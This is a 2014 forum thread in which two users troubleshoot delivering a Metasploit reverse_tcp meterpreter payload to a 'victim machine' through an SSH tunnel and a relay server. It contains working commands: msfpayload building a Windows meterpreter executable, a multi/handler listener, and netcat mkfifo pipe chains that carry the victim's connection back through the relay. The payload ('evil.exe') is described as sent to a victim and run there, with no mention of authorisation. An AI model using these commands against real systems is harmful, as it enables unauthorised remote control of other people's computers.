Need some help, metasploit reverse_tcp over ssh tunnel

[Darkrising]

Hello,

I have a 3G connection which I'm unable to open ports for so I'm using a remote server which is accessible from the internet.

I'm using Kali on my local computer and Ubuntu for the server.

Using the command:

ssh -R *:44444:localhost:44444 root@<the remote server>

and setting GatewayPorts clientspecified in the sshd config I've port forwarded port 44444 to my local Kali machine.

I then setup a reverse tcp handler running on 44444 with LHOST as 127.0.0.1

Lastly I made an evil.exe and sent and ran it on the victim machine.

However when I look at Kali I see

[*] Sending stage (770048 bytes) to 127.0.0.1

But no meterpreter shell is run.

Am I doing something wrong?

[i8igmac]

do u have access to netcat? Ruby python perl ?

u should check out mkfifo pips I can help with answer to my above question

[Darkrising]

do u have access to netcat? Ruby python perl ?

u should check out mkfifo pips I can help with answer to my above question

Yes, I do have access to them all

[i8igmac]

$ mkfifo mypipe

$ nc -l 8082 0<mypipe | nc yahoo:com 80 1>mypipe

Your netcat syntax may be different. Here is what mine looks like nc - l -p 8082

this is a basic proxy. Now from another terminal connect to this port 8082 and paste in a proper yahoo get request.

If this is simple enough we can move on to a reverse_proxy

Edited June 4, 2014 by i8igmac

[Darkrising]

$ mkfifo mypipe

$ nc -l 8082 0<mypipe | nc yahoo:com 80 1>mypipe

Your netcat syntax may be different. Here is what mine looks like nc - l -p 8082

this is a basic proxy. Now from another terminal connect to this port 8082 and paste in a proper yahoo get request.

If this is simple enough we can move on to a reverse_proxy

I understand, I've played with netcat before, should I be using netcat to proxy over the ssh tunnel?

Edit: I've been looking at what this person has done here: https://bechtsoudis.com/hacking/using-ssh-socks-proxies-with-msf-reverse-tcp-payloads/

However my kali just freezes on sending stage...

Edited June 4, 2014 by Darkrising

[i8igmac]

try another payload. Without the stage.

there are 3 machines involved with your project?

Kali--->SSH-BOX<---victim? ?

Your ssh-box is the only machine that can port forward?

I suggest running small test. With netcat you can perform hi world examples

Also. The link u provide, scrole down and u will see a netcat example like mine...

Edited June 4, 2014 by i8igmac

[Darkrising]

try another payload. Without the stage.

there are 3 machines involved with your project?

Kali--->SSH-BOX<---victim? ?

Your ssh-box is the only machine that can port forward?

I suggest running small test. With netcat you can perform hi world examples

Yeh, that's correct, Kali is behind a gateway which can't have any ports opened so the ssh box is the only machine which can port forward, the victim would connect through the ssh box which would port forward over ssh to the kali box.

I have run a few netcat tests which work correctly.

It seems metasploit on kali just locks up when a victim connects on sending stage, if I try interact with the session metasploit just locks up completely.

I have also tried a reverse_http but it just times out before meterpreter can open.

[i8igmac]

also, the link u provide there is a update at the bottem of the page. A netcat example like the one I provide...

If your machines are talking to each other then it may just be a metasploit issue

[Darkrising]

I just tried making a new evil.exe and this time when I try interact with the sessions I'm getting the error:

Session manipulation failed: Validation failed: Address is reserved

I Googled the error and came across this page: https://community.rapid7.com/thread/2046

It seems metasploit just doesn't like being tunnelled.

I have tried the VPN idea using pptpd but I ran into issues with ARP not being on the right subnet.

[i8igmac]

I may have came across this. I was successful in getting a reverse shell threw a tunnel. Video above I accomplished exactly what you are trying to do.. BUT I tunneled the traffic threw my android phone. I had to explore other types of tunnels, made my own tunnel out of ruby sockets in this video but I found netcat is simplest!

Try something generic reverse shell... no staging or anything

[Darkrising]

http:// youtu.be/UkRpOlGS4ew

I may have came across this. I was successful in getting a reverse shell threw a tunnel. Video above I accomplished exactly what you are trying to do.. BUT I tunneled the traffic threw my android phone. I had to explore other types of tunnels, made my own tunnel out of ruby sockets in this video but I found netcat is simplest!

Try something generic reverse shell... no staging or anything

Okay, sounds like a plan, I'll try experimenting with different tunnels and see what I can come up with :)

Edited June 4, 2014 by Darkrising

[i8igmac]

so. If this makes sense... what remember doing... on a droid at the moment...

To bypass the problem u experience with metasploit. I had to setup a proxy on the kali localhost that you would set LHOST/PORT to your multi/handler to localhost

Kali

Msfpayload reverse/payload set LPORT=1234 LHOST=ssh-box -x test.exe

Use multihandler

Set LHOST localhost

Set LPORT 4444

now start a netcat proxy with mkfifo to pass the payload to your ssh-box(impropersyntax)

Nc -l -p 4444 0< pipe | nc ssh-box 5555 1> pipe

Exploit

Now your ssh-box needs to accept this and pass it to the victim, notice 2 ports need forward

Ssh-box

Nc -l -p 5555 0< pipe | nc -l -p 1234 1> pipe

Now your victem executes the exe that connects back to ssh-box:1234... its a brain twister of ports and pipes. Wish i was at my puter for a proper example.

Edited June 4, 2014 by i8igmac

[i8igmac]

Ok, im at my machine, this should work...

kali_local-ip=192.168.70.103

ssh-box_ip=66.66.66.66 #public-ip

port 666 and 555 need to be farword on your ssh-box

ssh-box

mkfifo ssh-box

nc -l -p 555 0<ssh-box | nc -l -p 666 1>ssh-box

kali

from kali, generate payload and set up handler... transfer your payload to the victim... start some nc pipes

msfpayload windows/meterpreter/reverse_tcp LHOST=[ssh-box_ip] LPORT=666 X > test.exe

msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=[kali_local-ip] lport=444 E

#new terminal

mkfifo kali

nc [kali_local-ip] 444 0<kali | nc [ssh-box_ip] 555 1>kali

Now

victim execute test.exe will connect back to ssh on port 666

[Darkrising]

-Snip-

Hello, It's been a while since I've been messing with this stuff. I tried out your commands and got it to work over my lan, however when I try over the internet it fails.

When you say forward is that local or remote with ssh? or do I have to do something else.

Also would you be able to explain the nc commads? My understanding of netcat is a little limited. specifically 0<kali 1>kali moving in and out of the pipe I guess?

Thanks

Edit: I can't get this to work at all over the internet.

Edited September 8, 2014 by Darkrising